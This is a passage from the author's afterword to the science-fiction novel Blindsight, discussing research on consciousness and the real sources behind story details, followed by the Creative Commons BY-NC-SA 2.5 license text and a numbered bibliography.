+It might be easier to list the people who haven't taken a stab at "explaining" consciousness. Theories run the gamut from diffuse electrical fields to quantum puppet-shows; consciousness has been "located" in the frontoinsular cortex and the hypothalamus and a hundred dynamic cores in between100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110. (At least one theory111 suggests that while great apes and adult Humans are sentient, young Human children are not. I admit to a certain fondness for this conclusion; if childen aren't nonsentient, they're certainly psychopathic).
+But beneath the unthreatening, superficial question of what consciousness is floats the more functional question of what it's good for. Blindsight plays with that issue at length, and I won't reiterate points already made. Suffice to say that, at least under routine conditions, consciousness does little beyond taking memos from the vastly richer subconcious environment, rubber-stamping them, and taking the credit for itself. In fact, the nonconscious mind usually works so well on its own that it actually employs a gatekeeper in the anterious cingulate cortex to do nothing but prevent the conscious self from interfering in daily operations112, 113, 114. (If the rest of your brain were conscious, it would probably regard you as the pointy-haired boss from Dilbert.)
+Sentience isn't even necessary to develop a "theory of mind". That might seem completely counterintuitive: how could you learn to recognise that other individuals are autonomous agents, with their own interests and agendas, if you weren't even aware of your own? But there's no contradiction, and no call for consciousness. It is entirely possible to track the intentions of others without being the slightest bit self-reflective107. Norretranders declared outright that "Consciousness is a fraud"115.
+Art might be a bit of an exception. Aesthetics seem to require some level of self-awareness—in fact, the evolution of aethestics might even be what got the whole sentience ball rolling in the first place. When music is so beautiful if makes you shiver, that's the reward circuitry in your limbic system kicking in: the same circuitry that rewards you for fucking an attractive partner or gorging on sucrose116. It's a hack, in other words; your brain has learned how to get the reward without actually earning it through increased fitness98. It feels good, and it fulfills us, and it makes life worth living. But it also turns us inward and distracts us. Those rats back in the sixties, the ones that learned to stimulate their own pleasure centers by pressing a lever: remember them? They pressed those levers with such addictive zeal that they forgot to eat. They starved to death. I've no doubt they died happy, but they died. Without issue. Their fitness went to Zero.
+Aesthetics. Sentience. Extinction.
+And that brings us to the final question, lurking way down in the anoxic zone: the question of what consciousness costs. Compared to nonconscious processing, self-awareness is slow and expensive112. (The premise of a separate, faster entity lurking at the base of our brains to take over in emergencies is based on studies by, among others, Joe LeDoux of New York University117, 118). By way of comparison, consider the complex, lightning-fast calculations of savantes; those abilities are noncognitive119, and there is evidence that they owe their superfunctionality not to any overarching integration of mental processes but due to relative neurological fragmentation4. Even if sentient and nonsentient processes were equally efficient, the conscious awareness of visceral stimuli—by its very nature— distracts the individual from other threats and opportunities in its environment. (I was quite proud of myself for that insight. You'll understand how peeved I was to discover that Wegner had already made a similar point back in 1994120.) The cost of high intelligence has even been demonstrated by experiments in which smart fruit flies lose out to dumb ones when competing for food121, possibly because the metabolic demands of learning and memory leave less energy for foraging. No, I haven't forgotten that I've just spent a whole book arguing that intelligence and sentience are different things. But this is still a relevant experiment, because one thing both attributes do have in common is that they are metabolically expensive. (The difference is, in at least some cases intelligence is worth the price. What's the survival value of obsessing on a sunset?)
+While a number of people have pointed out the various costs and drawbacks of sentience, few if any have taken the next step and wondered out loud if the whole damn thing isn't more trouble than it's worth. Of course it is, people assume; otherwise natural selection would have weeded it out long ago. And they're probably right. I hope they are. Blindsight is a thought experiment, a game of Just suppose and What if. Nothing more.
+On the other hand, the dodos and the Steller sea cows could have used exactly the same argument to prove their own superiority, a thousand years ago: if we're so unfit, why haven't we gone extinct? Why? Because natural selection takes time, and luck plays a role. The biggest boys on the block at any given time aren't necessarily the fittest, or the most efficient, and the game isn't over. The game is never over; there's no finish line this side of heat death. And so, neither can there be any winners. There are only those who haven't yet lost.
+Cunningham's stats about self-recognition in primates: those too are real. Chimpanzees have a higher brain-to-body ratio than orangutans122, yet orangs consistently recognise themselves in mirrors while chimps do so only half the time123. Similarly, those nonhuman species with the most sophisticated language skills are a variety of birds and monkeys—not the presumably "more sentient" great apes who are our closest relatives81, 124. If you squint, facts like these suggest that sentience might almost be a phase, something that orangutans haven't yet grown out of but which their more-advanced chimpanzee cousins are beginning to. (Gorillas don't self-recognise in mirrors. Perhaps they've already grown out of sentience, or perhaps they never grew into it.)
+Of course, Humans don't fit this pattern. If it even is a pattern. We're outliers: that's one of the points I'm making.
+I bet vampires would fit it, though. That's the other one.
+Finally, some very timely experimental support for this unpleasant premise came out just as Blindsight was being copy edited: it turns out that the unconscious mind is better at making complex decisions than is the conscious mind125. The conscious mind just can't handle as many variables, apparently. Quoth one of the researchers: “At some point in our evolution, we started to make decisions consciously, and we're not very good at it.”126
+
+
+Miscellaneous Ambience (Background Details, Bad Wiring, and the Human Condition)
+
+The child Siri Keeton was not unique: we've been treating certain severe epilepsies by radical hemispherectomy for over fifty years now127. Surprisingly, the removal of half a brain doesn't seem to impact IQ or motor skills all that much (although most of hemispherectomy patients, unlike Keeton, have low IQs to begin with)128 . I'm still not entirely sure why they remove the hemisphere; why not just split the corpus callosum, if all you're trying to do is prevent a feedback loop between halves? Do they scoop out one half to prevent alien hand syndrome—and if so, doesn't that imply that they're knowingly destroying a sentient personality?
+
+The maternal-response opioids that Helen Keeton used to kickstart mother-love in her damaged son was inspired by recent work on attachment-deficit disorders in mice129. The iron-scavenging clouds that appear in the wake of the Firefall are based on those reported by Plane et al.130. I trawled The Gang of Four's linguistic jargon from a variety of sources81, 131, 132, 133. The multilingual speech patterns of Theseus' crew (described but never quoted, thank God) were inspired by the musings of Graddol134, who suggests that science must remain conversant in multiple grammars because language leads thought, and a single "universal" scientific language would constrain the ways in which we view the world.
+The antecedent of Szpindel's and Cunningham's extended phenotypes exists today, in the form of one Matthew Nagel135. The spliced prosthetics that allow them to synesthetically perceive output from their lab equipment hails from the remarkable plasticity of the brain's sensory cortices: you can turn an auditory cortex into a visual one by simply splicing the optic nerve into the auditory pathways (if you do it early enough)136, 137. Bates' carboplatinum augments have their roots in the recent development of metal musculature138, 139. Sascha's ironic denigration of TwenCen psychiatry hails not only from (limited) personal experience, but from a pair of papers140, 141 that strip away the mystique from cases of so-called multiple personality disorder. (Not that there's anything wrong with the concept; merely with its diagnosis.) The fibrodysplasia variant that kills Chelsea was based on symptoms described by Kaplan et al.142.
+And believe it or not, those screaming faces Sarasti used near the end of the book represent a very real form of statistical analysis: Chernoff Faces143, which are more effective than the usual graphs and statistical tables at conveying the essential characteristics of a data set144.
+
+
+
+
+
+
+
+
+Creative Commons Licensing Information
+
+
+Attribution-NonCommercial-ShareAlike 2.5
+License
+
+THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS PROHIBITED.
+
+BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.
+
+1. Definitions
+
+"Collective Work"means a work, such as a periodical issue, anthology or encyclopedia, in which the Work in its entirety in unmodified form, along with a number of other contributions, constituting separate and independent works in themselves, are assembled into a collective whole. A work that constitutes a Collective Work will not be considered a Derivative Work (as defined below) for the purposes of this License.
+
+"Derivative Work"means a work based upon the Work or upon the Work and other pre-existing works, such as a translation, musical arrangement, dramatization, fictionalization, motion picture version, sound recording, art reproduction, abridgment, condensation, or any other form in which the Work may be recast, transformed, or adapted, except that a work that constitutes a Collective Work will not be considered a Derivative Work for the purpose of this License. For the avoidance of doubt, where the Work is a musical composition or sound recording, the synchronization of the Work in timed-relation with a moving image ("synching") will be considered a Derivative Work for the purpose of this License.
+
+"Licensor"means the individual or entity that offers the Work under the terms of this License.
+
+"Original Author"means the individual or entity who created the Work.
+
+"Work"means the copyrightable work of authorship offered under the terms of this License.
+
+"You"means an individual or entity exercising rights under this License who has not previously violated the terms of this License with respect to the Work, or who has received express permission from the Licensor to exercise rights under this License despite a previous violation.
+
+"License Elements"means the following high-level license attributes as selected by Licensor and indicated in the title of this License: Attribution, Noncommercial, ShareAlike.
+
+2. Fair Use Rights.Nothing in this license is intended to reduce, limit, or restrict any rights arising from fair use, first sale or other limitations on the exclusive rights of the copyright owner under copyright law or other applicable laws.
+
+3. License Grant.Subject to the terms and conditions of this License, Licensor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for the duration of the applicable copyright) license to exercise the rights in the Work as stated below:
+
+to reproduce the Work, to incorporate the Work into one or more Collective Works, and to reproduce the Work as incorporated in the Collective Works;
+
+to create and reproduce Derivative Works;
+
+to distribute copies or phonorecords of, display publicly, perform publicly, and perform publicly by means of a digital audio transmission the Work including as incorporated in Collective Works;
+
+to distribute copies or phonorecords of, display publicly, perform publicly, and perform publicly by means of a digital audio transmission Derivative Works;
+
+The above rights may be exercised in all media and formats whether now known or hereafter devised. The above rights include the right to make such modifications as are technically necessary to exercise the rights in other media and formats. All rights not expressly granted by Licensor are hereby reserved, including but not limited to the rights set forth in Sections 4(e) and 4(f).
+
+4. Restrictions.The license granted in Section 3 above is expressly made subject to and limited by the following restrictions:
+
+You may distribute, publicly display, publicly perform, or publicly digitally perform the Work only under the terms of this License, and You must include a copy of, or the Uniform Resource Identifier for, this License with every copy or phonorecord of the Work You distribute, publicly display, publicly perform, or publicly digitally perform. You may not offer or impose any terms on the Work that alter or restrict the terms of this License or the recipients' exercise of the rights granted hereunder. You may not sublicense the Work. You must keep intact all notices that refer to this License and to the disclaimer of warranties. You may not distribute, publicly display, publicly perform, or publicly digitally perform the Work with any technological measures that control access or use of the Work in a manner inconsistent with the terms of this License Agreement. The above applies to the Work as incorporated in a Collective Work, but this does not require the Collective Work apart from the Work itself to be made subject to the terms of this License. If You create a Collective Work, upon notice from any Licensor You must, to the extent practicable, remove from the Collective Work any credit as required by clause 4(d), as requested. If You create a Derivative Work, upon notice from any Licensor You must, to the extent practicable, remove from the Derivative Work any credit as required by clause 4(d), as requested.
+
+You may distribute, publicly display, publicly perform, or publicly digitally perform a Derivative Work only under the terms of this License, a later version of this License with the same License Elements as this License, or a Creative Commons iCommons license that contains the same License Elements as this License (e.g. Attribution-NonCommercial-ShareAlike 2.5 Japan). You must include a copy of, or the Uniform Resource Identifier for, this License or other license specified in the previous sentence with every copy or phonorecord of each Derivative Work You distribute, publicly display, publicly perform, or publicly digitally perform. You may not offer or impose any terms on the Derivative Works that alter or restrict the terms of this License or the recipients' exercise of the rights granted hereunder, and You must keep intact all notices that refer to this License and to the disclaimer of warranties. You may not distribute, publicly display, publicly perform, or publicly digitally perform the Derivative Work with any technological measures that control access or use of the Work in a manner inconsistent with the terms of this License Agreement. The above applies to the Derivative Work as incorporated in a Collective Work, but this does not require the Collective Work apart from the Derivative Work itself to be made subject to the terms of this License.
+
+You may not exercise any of the rights granted to You in Section 3 above in any manner that is primarily intended for or directed toward commercial advantage or private monetary compensation. The exchange of the Work for other copyrighted works by means of digital file-sharing or otherwise shall not be considered to be intended for or directed toward commercial advantage or private monetary compensation, provided there is no payment of any monetary compensation in connection with the exchange of copyrighted works.
+
+If you distribute, publicly display, publicly perform, or publicly digitally perform the Work or any Derivative Works or Collective Works, You must keep intact all copyright notices for the Work and provide, reasonable to the medium or means You are utilizing: (i) the name of the Original Author (or pseudonym, if applicable) if supplied, and/or (ii) if the Original Author and/or Licensor designate another party or parties (e.g. a sponsor institute, publishing entity, journal) for attribution in Licensor's copyright notice, terms of service or by other reasonable means, the name of such party or parties; the title of the Work if supplied; to the extent reasonably practicable, the Uniform Resource Identifier, if any, that Licensor specifies to be associated with the Work, unless such URI does not refer to the copyright notice or licensing information for the Work; and in the case of a Derivative Work, a credit identifying the use of the Work in the Derivative Work (e.g., "French translation of the Work by Original Author," or "Screenplay based on original Work by Original Author"). Such credit may be implemented in any reasonable manner; provided, however, that in the case of a Derivative Work or Collective Work, at a minimum such credit will appear where any other comparable authorship credit appears and in a manner at least as prominent as such other comparable authorship credit.
+
+For the avoidance of doubt, where the Work is a musical composition:
+
+Performance Royalties Under Blanket Licenses. Licensor reserves the exclusive right to collect, whether individually or via a performance rights society (e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital performance (e.g. webcast) of the Work if that performance is primarily intended for or directed toward commercial advantage or private monetary compensation.
+
+Mechanical Rights and Statutory Royalties. Licensor reserves the exclusive right to collect, whether individually or via a music rights agency or designated agent (e.g. Harry Fox Agency), royalties for any phonorecord You create from the Work ("cover version") and distribute, subject to the compulsory license created by 17 USC Section 115 of the US Copyright Act (or the equivalent in other jurisdictions), if Your distribution of such cover version is primarily intended for or directed toward commercial advantage or private monetary compensation.
+
+Webcasting Rights and Statutory Royalties. For the avoidance of doubt, where the Work is a sound recording, Licensor reserves the exclusive right to collect, whether individually or via a performance-rights society (e.g. SoundExchange), royalties for the public digital performance (e.g. webcast) of the Work, subject to the compulsory license created by 17 USC Section 114 of the US Copyright Act (or the equivalent in other jurisdictions), if Your public digital performance is primarily intended for or directed toward commercial advantage or private monetary compensation.
+
+5. Representations, Warranties and Disclaimer
+
+UNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.
+
+6. Limitation on Liability.EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
+
+7. Termination
+
+This License and the rights granted hereunder will terminate automatically upon any breach by You of the terms of this License. Individuals or entities who have received Derivative Works or Collective Works from You under this License, however, will not have their licenses terminated provided such individuals or entities remain in full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License.
+
+Subject to the above terms and conditions, the license granted here is perpetual (for the duration of the applicable copyright in the Work). Notwithstanding the above, Licensor reserves the right to release the Work under different license terms or to stop distributing the Work at any time; provided, however that any such election will not serve to withdraw this License (or any other license that has been, or is required to be, granted under the terms of this License), and this License will continue in full force and effect unless terminated as stated above.
+
+8. Miscellaneous
+
+Each time You distribute or publicly digitally perform the Work or a Collective Work, the Licensor offers to the recipient a license to the Work on the same terms and conditions as the license granted to You under this License.
+
+Each time You distribute or publicly digitally perform a Derivative Work, Licensor offers to the recipient a license to the original Work on the same terms and conditions as the license granted to You under this License.
+
+If any provision of this License is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this License, and without further action by the parties to this agreement, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.
+
+No term or provision of this License shall be deemed waived and no breach consented to unless such waiver or consent shall be in writing and signed by the party to be charged with such waiver or consent.
+
+This License constitutes the entire agreement between the parties with respect to the Work licensed here. There are no understandings, agreements or representations with respect to the Work not specified here. Licensor shall not be bound by any additional provisions that may appear in any communication from You. This License may not be modified without the mutual written agreement of the Licensor and You.
+
+Creative Commons is not a party to this License, and makes no warranty whatsoever in connection with the Work. Creative Commons will not be liable to You or any party on any legal theory for any damages whatsoever, including without limitation any general, special, incidental or consequential damages arising in connection to this license. Notwithstanding the foregoing two (2) sentences, if Creative Commons has expressly identified itself as the Licensor hereunder, it shall have all rights and obligations of Licensor.
+
+Except for the limited purpose of indicating to the public that the Work is licensed under the CCPL, neither party will use the trademark "Creative Commons" or any related trademark or logo of Creative Commons without the prior written consent of Creative Commons. Any permitted use will be in compliance with Creative Commons' then-current trademark usage guidelines, as may be published on its website or otherwise made available upon request from time to time.
+
+Creative Commons may be contacted at http://creativecommons.org/.
+
+
+
+
+
+
+
+1 http://www.rifters.com/blindsight/vampires.htm
+2 Pennish, E. 2003. Cannibalism and prion disease may have been rampant in ancient humans. Science 300: 227-228.
+3 Mead, S. et al. 2003. Balancing Selection at the Prion Protein Gene Consistent with Prehistoric Kurulike Epidemics. Science 300: 640-643.
+4 Anonymous., 2004. Autism: making the connection. The Economist, 372(8387): 66.
+5 Balter, M. 2002. Ehat made Humans modern? Science 295: 1219-1225.
+6 Blanco-Arias, P., C.A. Sargent, and N.A. Affara1. 2004. A comparative analysis of the pig, mouse, and human PCDHX genes. Mammalian Genome, 15(4): 296-306.
+7 Kreider MS, et al. 1990. Reduction of thyrotropin-releasing hormone concentrations in central nervous system of African lungfish during estivation. Gen Comp Endocrinol. 77(3):435-41.
+8 Cui, Y. et al. 1996. State-dependent changes of brain endogenous opioids in mammalian hibernation. Brain Research Bulletin 40(2):129-33.
+9 Miller, K. 2004. Mars astronauts 'will hibernate for 50 million-mile journey in space'. News.telegraph.co.uk, 11/8/04.
+10 Calvin, W.H. 1990. The Cerebral Symphony: Seashore Reflections on the Structure of Consciousness. 401pp. Bantam Books, NY.
+11 Pennisi, E. 2004. The first language? Science 303: 1319-1320.
+12 Recordings of Hadzane click-based phonemes can be heard at http://hctv.humnet.ucla.edu/departments/linguistics/VowelsandConsonants/index.html
+13 Ramachandran, V.S. 1990. pp346-360 in The Utilitarian Theory of Perception, C. Blakemore (Ed.), Cambridge University Press, Cambridge.
+14 Purves, D. and R.B. Lotto. 2003. Why We See What We Do An Empirical Theory of Vision. Sinauer Associates, Sunderland, MA. 272 pp.
+15 Yarbus, A.L. 1967. Eye movements during perception of complex objects. In L. A. Riggs, Ed., Eye Movements and Vision, Plenum Press, New York, Chapter VII, 171-196.
+16 Pringle, H.L., et al. 2001. The role of attentional breadth in perceptual change detection. Psychonomic Bulletin & Review 8: 89-95(7)
+17 Simons, D.J., and Chabris, C.F. 1999. Gorillas in our midst: sustained inattentional blindness for dynamic events. Perception 28: 1059-1074
+18 Simons, D.J., and Rensink, R.A. 2003. Induced Failures of Visual Awareness. Journal of Vision 3(1).
+19 http://viscog.beckman.uiuc.edu/djs_lab/demos.html
+20 Metzinger, T. 2003. Being No One: The Self-Model Theory of Subjectivity. MIT Press, Cambridge, MA. 713pp.
+21 Wegner, D.M. 2002. The Illusion of Conscious Will. MIT Press, Cambridge. 405pp.
+22 Saks, O. 1970. The Man who mistook his wife for a hat and other clinical tales. Simon & Shuster, NY.
+23 American Psychiatric Association. 2000. Diagnostic and Statistical Manual of Mental Disorders. (4th Ed., Text Revision). Brandon/Hill.
+24 Ramachandran, V.S., and Blakeslee, S. 1998. Phantoms in the Brain: Probing the Mysteries of the Human Mind. William Morrow, New York.
+25 Persinger, M.A. 2001 The Neuropsychiatry of Paranormal Experiences. J Neuropsychiatry & Clinical Neuroscience 13: 515-524.
+26 Kamitani, Y. and Shimojo, S. 1999. Manifestation of scotomas created by transcranial magnetic stimulation of human visual cortex. Nature Neuroscience 2: 767-771.
+27 Hallett, M. 2000. Transcranial magnetic stimulation and the human brain. Nature 406: 147-150.
+28 Goldberg, C. 2003. Zap! Scientist bombards brains with super-magnets to edifying effect. Boston Globe 14/1/2003, pE1.
+29 Porter, R., and Lemon, R. 1993. Corticospinal function and voluntary movement. Oxford University Press, NY.
+30 Delgado, J.M.R. 1969. Physical control of the mind: toward a psychocivilised society. Harper & Row, NY.
+31 Libet, B. 1993. The neural time factor in conscious and unconscious events. Experimental and Theoretical Studies of Consciousness 174: 123-146.
+32 P. Haggard, P., and Eimer , M. 1999. On the relation between brain potentials and the awareness of voluntary movements. Experimental Brain Research 126: 128-133.
+33 Velmans, M. 2003. Preconscious free will. Journal of Consciousness Studies 10: 42-61.
+34 Pinto, C. 2003. Putting the brain on trial. May 5, 2003, Media General News Service.
+35 Macmillan, M. 2000. An Odd Kind of Fame Stories: of Phineas Gage. MIT Press, Cambridge, MA.
+36 Ehrsson, H.H., C. Spence, and R.E. Passingham 2004. That's My Hand! Activity in Premotor Cortex Reflects Feeling of Ownership of a Limb. Science 305: 875-877.
+37 Gottleib, J., and P. Mazzoni. 2004. Action, illusion, and perception. Science 303: 317-318.
+38 Schwartz, A.B., D.W. Moran, and G.A. Reina. 2004. Differential representation of perception and action in the frontal cortex. Science 303: 380-383.
+39 Norton, S.J., 2003. Can ultrasound be used to stimulate nerve tissue? BioMedical Engineering OnLine 2:6, available at http://www.biomedical-engineering-online.com/content/2/1/6 .
+40 Hogan, J., and Fox, B. 2005. Sony patent takes first step towards real-life Matrix. Excerpted from New Scientist 2494:10, available at http://www.newscientist.com/article.ns?id=mg18624944.600 .
+41 Riebe, M. et al. 2004. Deterministic quantum teleportation with atoms. Nature 429: 734 - 737.
+42 Furusawa, A. et al. 1998. Unconditional Quantum Teleportation. Science, 282(5389): 706-709
+43 Carlton M. Caves, C.M. 1998. A Tale of Two Cities. Science, 282: 637-638
+44 Braunstein, S.L., and Kimble, H.J. 1998. Teleportation of continuous quantum variables. Physical Review Letters 80: 869-872.
+45 http://www.research.ibm.com/quantuminfo/teleportation/
+46 http://math.ucr.edu/home/baez/physics/Relativity/SR/rocket.html
+47 Atkinson, N. 2004. Magnetic Bubble Could Protect Astronauts on Long Trips . Universe Today, http://www.universetoday.com/am/publish/magnetic_bubble_protect.html
+48 Holzscheiter, M.H., et al. 1996. Production and trapping of antimatter for space propulsion applications. American Institute of Aeronautics and Astronautics-1996-2786 ASME, SAE, and ASEE, Joint Propulsion Conference and Exhibit, 32nd, Lake Buena Vista, FL, July 1-3.
+49 www.engr.psu.edu/antimatter/Papers/NASA_anti.pdf
+50 Blacstone, E., et al. 2005. H 2 S Induces a Suspended Animation–Like State in Mice. Science 308: 518.
+51 The data have not been published as of this writing.
+52 Bails, J. 2005. Pitt scientists resurrect hope of cheating death. Pittburgh Tribune-Review, June 29. Available online at http://www.pittsburghlive.com/x/tribune-review/trib/regional/s_348517.html
+53 Oasa, Y. et al. 1999. A deep near-infrared survey of the chamaeleon i dark cloud core. Astrophysical Journal 526: 336-343.
+54 Normile, D. 2001. Cosmic misfits elude star-formation theories. Science 291: 1680.
+55 Lucas, P.W., and P.F. Roche. 2000. A population of very young brown dwarfs and free-floating planets in Orion. Monthly Notices of the Royal Astronomical Society 314: 858-864.
+56 Najita, J.R., G.P. Tiede, and J.S. Carr. 2000. From stars to superplanets: The low-mass initial mass function in the young cluster IC 348. Astrophysical Journal 541(Oct. 1):977-1003.
+57 Matthews, Jaymie. 2005. Personal communication.
+58 Liu, W., and Schultz, D.R. 1999. Jovian x-ray aurora and energetic oxygen ion precipitation. Astrophysical Journal 526:538-543.
+59 Chen, P.V. 2001. Magnetic field on Jupiter. The Physics Factbook, http://hypertextbook.com/facts/
+60 Osorio, M.R.Z. et al. 2000. Discovery of Young, Isolated Planetary Mass Objects in the Orionis Star Cluster. Science 290: 103-106.
+61 Lemley, B. 2002. Nuclear Planet. Discover23(8).
+62 http://www.nuclearplanet.com/
+63 Dulk, G.A., et al. 1997. Search for Cyclotron-maser Radio Emission from Extrasolar Planets. Abstracts of the 29th Annual Meeting of the Division for Planetary Sciences of the American Astronomical Society, July 28–August 1, 1997, Cambridge, Massachusetts.
+64 Marley, M. et al. 1997. Model Visible and Near-infrared Spectra of Extrasolar Giant Planets. Abstracts of the 29th Annual Meeting of the Division for Planetary Sciences of the American Astronomical Society, July 28–August 1, 1997, Cambridge, Massachusetts.
+65 Boss, A. 2001. Formation of Planetary-Mass Objects by Protostellar Collapse and Fragmentation. Astrophys. J. 551: L167.
+66 Low, C., and D. Lynden-Bell. 1976. The minimum Jeans mass or when fragmentation must stop. Mon. Not. R. Astron. Soc. 176: 367.
+67 Jayawardhana, R. 2004. Unraveling Brown Dwarf Origins. Science 303: 322-323
+68 Fegley, B., and K. Lodders. 1996. Atmospheric Chemistry of the Brown Dwarf Gliese 229B: Thermochemical Equilibrium Predictions. Astrophys. J. 472: L37.
+69 Lodders, K. 2004. Brown Dwarfs--Faint at Heart, Rich in Chemistry. Science 303: 323-324
+70 Adam Burgasser. 2002. June 1 edition of the Astrophysics Journal Letters
+71 Reid, I.N. 2002 Failed stars or overacheiving planets? Science 296: 2154-2155.
+72 Gizis, J.E. 2001. Brown dwarfs (enhanced review) Online article supplementing Science 294: 801.
+73 Clarke, S. 2003. Milky Way's nearest neighbour revealed. NewScientist.com News Service, 04/11/03.
+74 Basri, G. 2000. Observations of brown dwarfs. Annu. Rev. Astron. Astrophys 38:485–519.
+75 Tamura, M. et al. 1998. Isolated and Companion Young Brown Dwarfs in the Taurus and Chamaeleon Molecular Clouds. Science 282: 1095-1097.
+76 Berger, E. 2001. Discovery of radio emission from the brown dwarf LP944-20. Nature 410: 338-340.
+77 Anonymous, 2000. A brown dwarf solar flare. Science@Nasa, http://science.nasa.gov/headlines/y2000/ast12jul_1m.htm
+78 Schilling, G. 2001. Comet's course hints at mystery planet. Science 292: 33.
+79Evelyne Kohler, E. et al. 2002. Hearing Sounds, Understanding Actions: Action Representation in Mirror Neurons. Science 297: 846-848
+80 Rizzolatti, G, and Arbib, M.A. 1998. Language Within Our Grasp. Trends in Neuroscience 21(5):188-194.
+81 Hauser, M.D., N. Chomsky, and W.T. Fitch. 2002. The faculty of language: what is it, who has it, and how did it evolve? Science 298: 1569-1579.
+82 Miller, G. 2005. Reflecting on Another's Mind. Science 308: 945-947
+83 Pfeiffer, T., S. Schuster, and S. Bonhoeffer. 2001. Cooperation and Competition in the Evolution of ATP-Producing Pathways Science 20 292: 504-507.
+84 McMahon, R.J. 2003. Chemical Reactions Involving Quantum Tunneling. Science 299: 833-834.
+85 Zuev, P.S. et al. 2003. Carbon Tunneling from a Single Quantum State. Science 299: 867-870
+86 Darwin, Charlie "Chuckles". 1859. The Origin of Species by Means of Natural Selection. Penguin Classics Edition, reprinted 1968. Originally published by John Murray, London.
+87 Cho, A. 2004. Life's Patterns: No Need to Spell It Out? Science 303: 782-783.
+88 Cohen, J., and Stewart, S. 2005. Where are the dolphins? Nature 409: 1119-1122.
+89Reilly, J.J. 1995. After Darwin. First Things, June/July. Article also available online at http://pages.prodigy.net/aesir/darwin.htm.
+90 Devlin, K. 2004. Cracking the da Vinci Code. Discover 25(6): 64-69.
+91 Snir, Y, and Kamien, R.D. 2005. Entropically Driven Helix Formation. Science 307: 1067.
+92 Wolfram, S. 2002. A New Kind of Science. Wolfram Media. 1192pp.
+93 Albert, M.L. 2004. Danger in Wonderland. Science 303: 1141
+94 Muotri, A.R., et al. 2005. Somatic mosaicism in neuronal precursor cells mediated by L1 retrotransposition. Nature 435: 903-910.
+95 Nelson, D.L., and M.M Cox. 200. Lehninger principles of biochemistry. Worth, NY, NY.
+96 Prigonine, I., and G. Nicholis. 1989. Exploring Complexity. Freeman, NY.
+97 Dawkins, R. 1988. The Blind Watchmaker: Why the Evidence of Evolution Reveals a Universe Without Design. Norton.
+98 Pinker, S. 1997. How the mind works. WW Norton & Co., NY. 660pp.
+99 Koch, C. 2004. The Quest for Consciousness: A Neurobiological Approach Roberts, Englewood, CO. 447pp.
+100 McFadden, J. 2002. Synchronous firing and its influence on the brain’s electromagnetic field: evidence for an electromagnetic field theory of consciousness. J. Consciousness Studies, 9, No. 4, 2002, pp. 23–50
+101 Penrose, R. 1989. The Emporer's New Mind. Oxford University Press.
+102 Tononi, G., and G.M. Edelman. 1998. Consciousness and Complexity. Science 282: 1846-1851.
+103 Baars, B.J. 1988. A Cognitive Theory of Consciousness. Cambridge Univ. Press, New York.
+104 Hilgetag, C.C. 2004. Learning from switched-off brains. Sci. Amer. 14: 8-9.
+105 Roth, G. 2004. The quest to find consciousness. Sci. Amer. 14: 32-39.
+106 Pauen, M. 2004. Does free will arise freely? Sci. Amer. 14: 41-47.
+107 Zimmer, C. 2003. How the mind reads other minds. Science 300:1079-1080.
+108 Crick, F.H.C., and C. Koch. 2000. The unconscious homunculus. In Neural Correlates of Consciousness—Empirical and Conceptual Questions (T. Metzinger, Ed.) MIT Press, Cambridge.
+109 Churchland, P.S. 2002. Self-Representation in Nervous Systems. Science 296: 308-310.
+110 Miller, G. 2005. What is the biological basis of consciousness? Science 309: 79.
+111 Blakeslee, S. 2003. The christmas tree in your brain. Toronto Star, 21/12/03
+112 Matsumoto, K., and K. Tanaka. 2004. Conflict and Cognitive Control. Science 303: 969-970.
+113 Kerns, J.G., et al. 2004. Anterior Cingulate Conflict Monitoring and Adjustments in Control. Science 303: 1023-1026.
+114 Petersen, S.E. et al. 1998. The effects of practice on the functional anatomy of task performance. Proceedings of the National Academy of Sciences 95: 853-860.
+115 Nrretranders, T. 1999. The User Illusion: Cutting Consciousness Down to Size. Penguin Press Science. 467pp.
+116 Altenmüller, E.O. 2004. Music in your head. Scientific American. 14: 24-31.
+117 Helmuth, L. 2003. Fear and Trembling in the Amygdala. SCience 300: 568-569.
+118 Dolan, R.J. 2002. Emotion, cognition, and behavior. Science 298: 1191-1194.
+119 Treffert, D.A., and G.L. Wallace. 2004. Islands of genius. Scientific American 14: 14-23.
+120 Wegner, D.M. 1994. Ironic processes of mental control. Psychol. Rev. 101: 34-52.
+121 Proceedings of the Royal Society of London B (DOI 10.1098/rspb.2003.2548)
+122 Aiello, L., and C. Dean. 1990. An introduction to human evolutionary anatomy. Academic Press, London.
